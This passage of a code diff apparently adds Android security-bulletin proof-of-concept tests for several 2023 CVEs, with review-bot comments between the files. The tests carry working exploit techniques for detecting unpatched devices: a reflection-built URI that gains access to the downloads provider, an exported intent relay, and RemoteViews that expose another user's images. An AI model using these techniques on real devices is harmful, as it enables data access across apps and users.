+ Pattern.compile("__CVE_2023_21260", Pattern.CASE_INSENSITIVE);
+ assumeTrue(
+ "Test app not found in Notification access app list",
+ device.wait(Until.hasObject(By.text(testListenerPattern)), waitMS));
+ final String carSettingsPackage = device.getCurrentPackageName();
+ device.findObject(By.text(testListenerPattern)).click();
+
+ // Find Notification access permission dialog box
+ final BySelector popupTitleAutomotiveSelector =
+ By.clazz(android.widget.TextView.class.getName())
+ .res(carSettingsPackage + ":id/car_ui_alert_title")
+ .pkg(carSettingsPackage);
+ assumeTrue(
+ "Notification access permission dialog box not found",
+ device.wait(Until.hasObject(popupTitleAutomotiveSelector), waitMS));
+
+ // With fix, the CRLF characters in the TestListener label would be removed
+ assertFalse(
+ "Vulnerable to b/259384309",
+ device.findObject(popupTitleAutomotiveSelector)
+ .getText()
+ .contains("\n\nCVE_2023_21260_TestListener_BugPresent"));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
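Review bot: The final `assertFalse` passes for any dialog title that lacks the exact `\n\n`-prefixed string, including a title that never mentions the TestListener label, so an unrelated dialog reads as "fixed". Assuming the patched dialog still shows the label with the newlines stripped (the comment above the assert suggests so), read the title once and gate on it first, e.g. `assumeTrue("Dialog title does not show TestListener label", title.contains("CVE_2023_21260_TestListener_BugPresent"));`, then assert on the newline form. That comment also says CRLF while the manifest label contains only `\n`, and the `UiObject2` import is unused.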
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/src/android/security/cts/CVE_2023_21260/TestListener.java
similarity index 70%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to hostsidetests/securitybulletin/test-apps/CVE-2023-21260/src/android/security/cts/CVE_2023_21260/TestListener.java
index 4416990..6ffd19b 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/src/android/security/cts/CVE_2023_21260/TestListener.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -14,9 +14,8 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2023_21260;
-import android.app.Activity;
+import android.service.notification.NotificationListenerService;
-public class PocActivity extends Activity {
-}
+public class TestListener extends NotificationListenerService {}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/Android.bp
new file mode 100644
index 0000000..bc60c24
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/Android.bp
@@ -0,0 +1,47 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21272-test",
+ srcs: [
+ "test-app/src/**/*.java"
+ ],
+ test_suites: [
+ "sts",
+ ],
+ manifest: "test-app/AndroidManifest.xml",
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ ],
+ platform_apis: true,
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21272-helper",
+ test_suites: [
+ "sts",
+ ],
+ srcs: [
+ "helper-app/src/**/*.java"
+ ],
+ manifest: "helper-app/AndroidManifest.xml",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/helper-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/helper-app/AndroidManifest.xml
new file mode 100644
index 0000000..95ced3d
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/helper-app/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21272_helper">
+ <application>
+ <activity android:name=".PocActivity"
+ android:exported="true" />
+ </application>
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/helper-app/src/android/security/cts/CVE_2023_21272_helper/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/helper-app/src/android/security/cts/CVE_2023_21272_helper/PocActivity.java
new file mode 100644
index 0000000..744cc754
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/helper-app/src/android/security/cts/CVE_2023_21272_helper/PocActivity.java
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21272_helper;
+
+import static android.content.pm.PackageManager.PERMISSION_GRANTED;
+
+import android.app.Activity;
+import android.content.Intent;
+import android.net.Uri;
+import android.os.Process;
+
+public class PocActivity extends Activity {
+ @Override
+ protected void onResume() {
+ super.onResume();
+
+ // If current package has permission to 'downloads' authority then send broadcast
+ if (this.checkUriPermission(
+ Uri.parse("content://downloads/all_downloads"),
+ Process.myPid(),
+ Process.myUid(),
+ 0 /* modeFlags */)
+ == PERMISSION_GRANTED) {
+ sendBroadcast((getIntent().getParcelableExtra(Intent.EXTRA_INTENT)));
+ }
+ }
+}
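Review bot: The extra read in `onResume` goes to `sendBroadcast` unchecked. The helper manifest exports this activity, so a launch without `Intent.EXTRA_INTENT` crashes the helper once the permission check succeeds. A null guard makes that case a no-op: `Intent result = getIntent().getParcelableExtra(Intent.EXTRA_INTENT);` followed by `if (result != null) sendBroadcast(result);`. Because the forwarded intent is caller-controlled, a comment stating that this relay is test-only would help, as would calling `finish()` afterwards so the activity does not stay on screen.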
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/AndroidManifest.xml
new file mode 100644
index 0000000..7afe635
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/AndroidManifest.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21272_test">
+ <application>
+ <provider android:name=".TestProvider"
+ android:authorities="download"
+ android:grantUriPermissions="true"
+ android:enabled="true" />
+ </application>
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21272_test" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/src/android/security/cts/CVE_2023_21272_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/src/android/security/cts/CVE_2023_21272_test/DeviceTest.java
new file mode 100644
index 0000000..3909376
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/src/android/security/cts/CVE_2023_21272_test/DeviceTest.java
@@ -0,0 +1,123 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21272_test;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+
+import android.app.ActivityManager;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.net.Uri;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.lang.reflect.Constructor;
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testCVE_2023_21272() {
+ try {
+ Context context = getInstrumentation().getContext();
+
+ // 'Path', 'PathPart', and 'HierarchicalUri' classes are in default scope of Uri.java.
+ // Hence, reflection is used to access their APIs
+ final String targetPkg = "android.security.cts.CVE_2023_21272_helper";
+ Class partClass = Class.forName("android.net.Uri$Part");
+ Constructor partConstructor =
+ partClass.getDeclaredConstructor(String.class, String.class);
+ partConstructor.setAccessible(true);
+
+ Class pathPartClass = Class.forName("android.net.Uri$PathPart");
+ Constructor pathPartConstructor =
+ pathPartClass.getDeclaredConstructor(String.class, String.class);
+ pathPartConstructor.setAccessible(true);
+
+ Class hierarchicalUriClass = Class.forName("android.net.Uri$HierarchicalUri");
+ Constructor hierarchicalUriConstructor =
+ hierarchicalUriClass.getDeclaredConstructor(
+ String.class, partClass, pathPartClass, partClass, partClass);
+ hierarchicalUriConstructor.setAccessible(true);
+
+ final String testAuthority = "download";
+ Object authority = partConstructor.newInstance(testAuthority, testAuthority);
+ final String testPath = "s/all_downloads";
+ Object path = pathPartConstructor.newInstance(testPath, testPath);
+ Uri testUri =
+ (Uri)
+ hierarchicalUriConstructor.newInstance(
+ "content",
+ authority,
+ path,
+ null /* query */,
+ null /* fragment */);
+ Semaphore broadcastReceived = new Semaphore(0);
+ final String broadcastAction = "CVE_2023_21272_broadcastAction";
+
+ // Register a broadcast receiver to receive broadcast from PocActivity indicating
+ // presence of vulnerability
+ BroadcastReceiver broadcastReceiver =
+ new BroadcastReceiver() {
+ @Override
+ public void onReceive(Context context, Intent intent) {
+ try {
+ if (intent.getAction().equals(broadcastAction)) {
+ broadcastReceived.release();
+ }
+ } catch (Exception ignored) {
+ // ignore any exceptions
+ }
+ }
+ };
+
+ context.registerReceiver(broadcastReceiver, new IntentFilter(broadcastAction));
+
+ // Grant read uri permission to 'targetPkg' for 'testUri'
+ ActivityManager.getService()
+ .grantUriPermission(
+ context.getIApplicationThread(),
+ targetPkg,
+ testUri,
+ Intent.FLAG_GRANT_READ_URI_PERMISSION,
+ context.getUserId());
+
+ // Check if the uri permission was granted to correct authority or not. Without fix,
+ // permission is granted to 'downloads' authority and the test fails
+ context.startActivity(
+ new Intent()
+ .setClassName(targetPkg, targetPkg + ".PocActivity")
+ .putExtra(Intent.EXTRA_INTENT, new Intent(broadcastAction))
+ .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+ assertFalse(
+ "Vulnerable to b/227471459",
+ broadcastReceived.tryAcquire(5_000 /* waitMs */, TimeUnit.MILLISECONDS));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
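Review bot: `context.registerReceiver(broadcastReceiver, new IntentFilter(broadcastAction))` registers without an export flag, although the broadcast it waits for comes from another package (the helper's PocActivity). If this test app ends up targeting API 34 or later, that call throws a SecurityException, and the outer `catch (Exception e)` turns it into an assumption failure, so the test would be skipped rather than run. I would state the intent explicitly with `context.registerReceiver(broadcastReceiver, new IntentFilter(broadcastAction), Context.RECEIVER_EXPORTED);`. The receiver is also never unregistered; `context.unregisterReceiver(broadcastReceiver)` belongs in a `finally` block.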
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/src/android/security/cts/CVE_2023_21272_test/TestProvider.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/src/android/security/cts/CVE_2023_21272_test/TestProvider.java
new file mode 100644
index 0000000..cb5f575
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/src/android/security/cts/CVE_2023_21272_test/TestProvider.java
@@ -0,0 +1,61 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21272_test;
+
+import android.content.ContentProvider;
+import android.content.ContentValues;
+import android.database.Cursor;
+import android.net.Uri;
+
+public class TestProvider extends ContentProvider {
+ public TestProvider() {}
+
+ @Override
+ public int delete(Uri uri, String selection, String[] selectionArgs) {
+ return 0;
+ }
+
+ @Override
+ public String getType(Uri uri) {
+ return "";
+ }
+
+ @Override
+ public Uri insert(Uri uri, ContentValues values) {
+ return null;
+ }
+
+ @Override
+ public boolean onCreate() {
+ return false;
+ }
+
+ @Override
+ public Cursor query(
+ Uri uri,
+ String[] projection,
+ String selection,
+ String[] selectionArgs,
+ String sortOrder) {
+ return null;
+ }
+
+ @Override
+ public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) {
+ return 0;
+ }
+}
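Review bot: `onCreate()` returns `false`, which by the ContentProvider contract reports that the provider failed to load; the stub should `return true;`. A class-level comment is also missing: the provider appears to exist only so that the test app owns the `download` authority declared in its manifest, and every operation is a deliberate no-op. Saying so would stop a later reader from treating the empty methods as unfinished work.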
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/Android.bp
new file mode 100644
index 0000000..a1460c4
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21279",
+ defaults: [
+ "cts_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/AndroidManifest.xml
new file mode 100644
index 0000000..4a3a362
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21279">
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21279" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/res/layout/cve_2023_21279_layout.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/res/layout/cve_2023_21279_layout.xml
new file mode 100644
index 0000000..2d6ff03
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/res/layout/cve_2023_21279_layout.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<ImageView xmlns:android="http://schemas.android.com/apk/res/android"
+ android:id="@+id/cve_2023_21279_img"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent" />
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/src/android/security/cts/CVE_2023_21279/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/src/android/security/cts/CVE_2023_21279/DeviceTest.java
new file mode 100644
index 0000000..9041934
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/src/android/security/cts/CVE_2023_21279/DeviceTest.java
@@ -0,0 +1,150 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21279;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertNull;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.UiAutomation;
+import android.content.ContentProvider;
+import android.content.Context;
+import android.content.pm.UserInfo;
+import android.graphics.drawable.Icon;
+import android.net.Uri;
+import android.os.UserManager;
+import android.provider.MediaStore;
+import android.util.SizeF;
+import android.widget.RemoteViews;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.HashMap;
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ private AutoCloseable withAdoptShellPermissionIdentity(
+ UiAutomation uiAutomation, String permission) {
+ uiAutomation.adoptShellPermissionIdentity(permission);
+
+ // Remove permissions
+ return () -> uiAutomation.dropShellPermissionIdentity();
+ }
+
+ @Test
+ public void testPocCVE_2023_21279() {
+ UiDevice uiDevice = null;
+ try {
+ final String cveId = "cve_2023_21279_";
+ final String title = cveId + "title";
+ final Uri externalContentUri = MediaStore.Images.Media.EXTERNAL_CONTENT_URI;
+
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = instrumentation.getContext();
+ UiAutomation uiAutomation = instrumentation.getUiAutomation();
+ uiDevice = UiDevice.getInstance(instrumentation);
+ int userId = -1;
+
+ // Retrieve created user Id
+ try (AutoCloseable withAdoptShellPermissionIdentity =
+ withAdoptShellPermissionIdentity(
+ uiAutomation, android.Manifest.permission.CREATE_USERS)) {
+ final List<UserInfo> list = context.getSystemService(UserManager.class).getUsers();
+ for (UserInfo info : list) {
+ if (info.name.contains(cveId)) {
+ userId = info.id;
+ break;
+ }
+ }
+ }
+ assumeTrue(userId != -1);
+
+ RemoteViews remoteView1 =
+ new RemoteViews(context.getPackageName(), R.layout.cve_2023_21279_layout);
+ remoteView1.setImageViewUri(
+ R.id.cve_2023_21279_img,
+ ContentProvider.maybeAddUserId(externalContentUri, userId));
+ RemoteViews remoteView2 = remoteView1;
+ HashMap<SizeF, RemoteViews> remoteViewsMap = new HashMap<SizeF, RemoteViews>();
+ remoteViewsMap.put(new SizeF(0, 0), remoteView1);
+ remoteViewsMap.put(new SizeF(1, 1), remoteView2);
+ RemoteViews remoteViewOuter = new RemoteViews(remoteViewsMap);
+ NotificationChannel notificationChannel =
+ new NotificationChannel(cveId, cveId, NotificationManager.IMPORTANCE_DEFAULT);
+ NotificationManager notificationManager =
+ context.getSystemService(NotificationManager.class);
+ notificationManager.createNotificationChannel(notificationChannel);
+ Notification notification =
+ new Notification.Builder(context, cveId)
+ .setContentTitle(title)
+ .setSmallIcon(
+ Icon.createWithData(
+ new byte[0] /* data */, 0 /* offset */, 0 /* length */))
+ .setCustomContentView(remoteViewOuter)
+ .setCustomBigContentView(remoteViewOuter)
+ .build();
+ try {
+ notificationManager.notify(0 /* id */, notification);
+ } catch (SecurityException securityException) {
+ if (securityException
+ .getLocalizedMessage()
+ .toLowerCase()
+ .contains(externalContentUri.toString())) {
+ // Ignore exception thrown with fix and exit the test
+ return;
+ } else {
+ throw securityException;
+ }
+ }
+
+ // Open notification shade
+ assumeTrue("Opening notification shade unsuccessful", uiDevice.openNotification());
+
+ // Wait for notification to appear and detect if the remote view is present
+ uiDevice.wait(Until.hasObject(By.text(title)), 3000 /* timeout */);
+ UiObject2 exposedImg =
+ uiDevice.findObject(By.res(context.getPackageName(), cveId + "img"));
+ assertNull(
+ "Device is vulnerable to b/277741109, Other user's images can be exposed in"
+ + " notifications using remote views",
+ exposedImg);
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ uiDevice.pressHome();
+ } catch (Exception e) {
+ // Ignore exceptions as the test has finished
+ }
+ }
+ }
+}
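Review bot: The result of `uiDevice.wait(Until.hasObject(By.text(title)), 3000 /* timeout */)` is discarded, so when the notification never renders, `findObject` returns null and `assertNull` reports the device as not vulnerable. That can happen for reasons unrelated to the fix, for example if POST_NOTIFICATIONS is only declared in the manifest and not granted at run time. Gate on the notification being visible, e.g. `assumeTrue("Notification not shown", uiDevice.wait(Until.hasObject(By.text(title)), 3000 /* timeout */));`, after confirming on a device that the title is still drawn when a custom content view is set. The posted notification is also left behind; hoisting `notificationManager` out of the `try` would allow `notificationManager.cancel(0 /* id */)` in the `finally` block.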
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/Android.bp
new file mode 100644
index 0000000..3700d8b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21285",
+ defaults: [
+ "cts_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "compatibility-device-util-axt",
+ "sts-device-util",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/AndroidManifest.xml
new file mode 100644
index 0000000..46a9d56
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/AndroidManifest.xml
@@ -0,0 +1,23 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21285">
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21285" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/src/android/security/cts/CVE_2023_21285/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/src/android/security/cts/CVE_2023_21285/DeviceTest.java
new file mode 100644
index 0000000..5a6dd58
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/src/android/security/cts/CVE_2023_21285/DeviceTest.java
@@ -0,0 +1,146 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21285;
+
+import static android.provider.MediaStore.Images.Media.EXTERNAL_CONTENT_URI;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.content.ContentProvider;
+import android.content.Context;
+import android.content.pm.UserInfo;
+import android.media.MediaMetadata;
+import android.media.session.MediaController;
+import android.media.session.MediaSession;
+import android.os.Handler;
+import android.os.HandlerThread;
+import android.os.UserManager;
+import android.util.Log;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.compatibility.common.util.SystemUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.io.IOException;
+import java.util.List;
+import java.util.concurrent.CompletableFuture;
+import java.util.concurrent.TimeUnit;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testPocCVE_2023_21285() {
+ try {
+ // Get the user id of "cve_2023_21285_user" created in testPocCVE_2023_21285()
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = getInstrumentation().getContext();
+ int testUserId =
+ SystemUtil.runWithShellPermissionIdentity(
+ () -> {
+ UserManager userManager =
+ context.getSystemService(UserManager.class);
+ List<UserInfo> users = userManager.getUsers();
+ int userId = -1;
+ for (UserInfo user : users) {
+ if (user.name.equals("cve_2023_21285_user")) {
+ userId = user.id;
+ break;
+ }
+ }
+ return userId;
+ },
+ android.Manifest.permission.CREATE_USERS);
+ assumeTrue("Unable to find the user cve_2023_21285_user", testUserId != -1);
+
+ // Insert a placeholder content in the new user and query it to see if it has been
+ // inserted successfully
+ final String imagesContentUri = EXTERNAL_CONTENT_URI.toString();
+ assumeTrue(
+ "Failed to insert a placeholder content in the test user",
+ poll(
+ () -> {
+ try {
+ SystemUtil.runShellCommand(
+ instrumentation,
+ String.format(
+ "content insert --user %d --uri %s --bind "
+ + "_display_name:s:cve_2023_21285.jpg",
+ testUserId, imagesContentUri));
+ return SystemUtil.runShellCommand(
+ instrumentation,
+ String.format(
+ "content query " + "--user %d --uri %s",
+ testUserId, imagesContentUri))
+ .contains("Row");
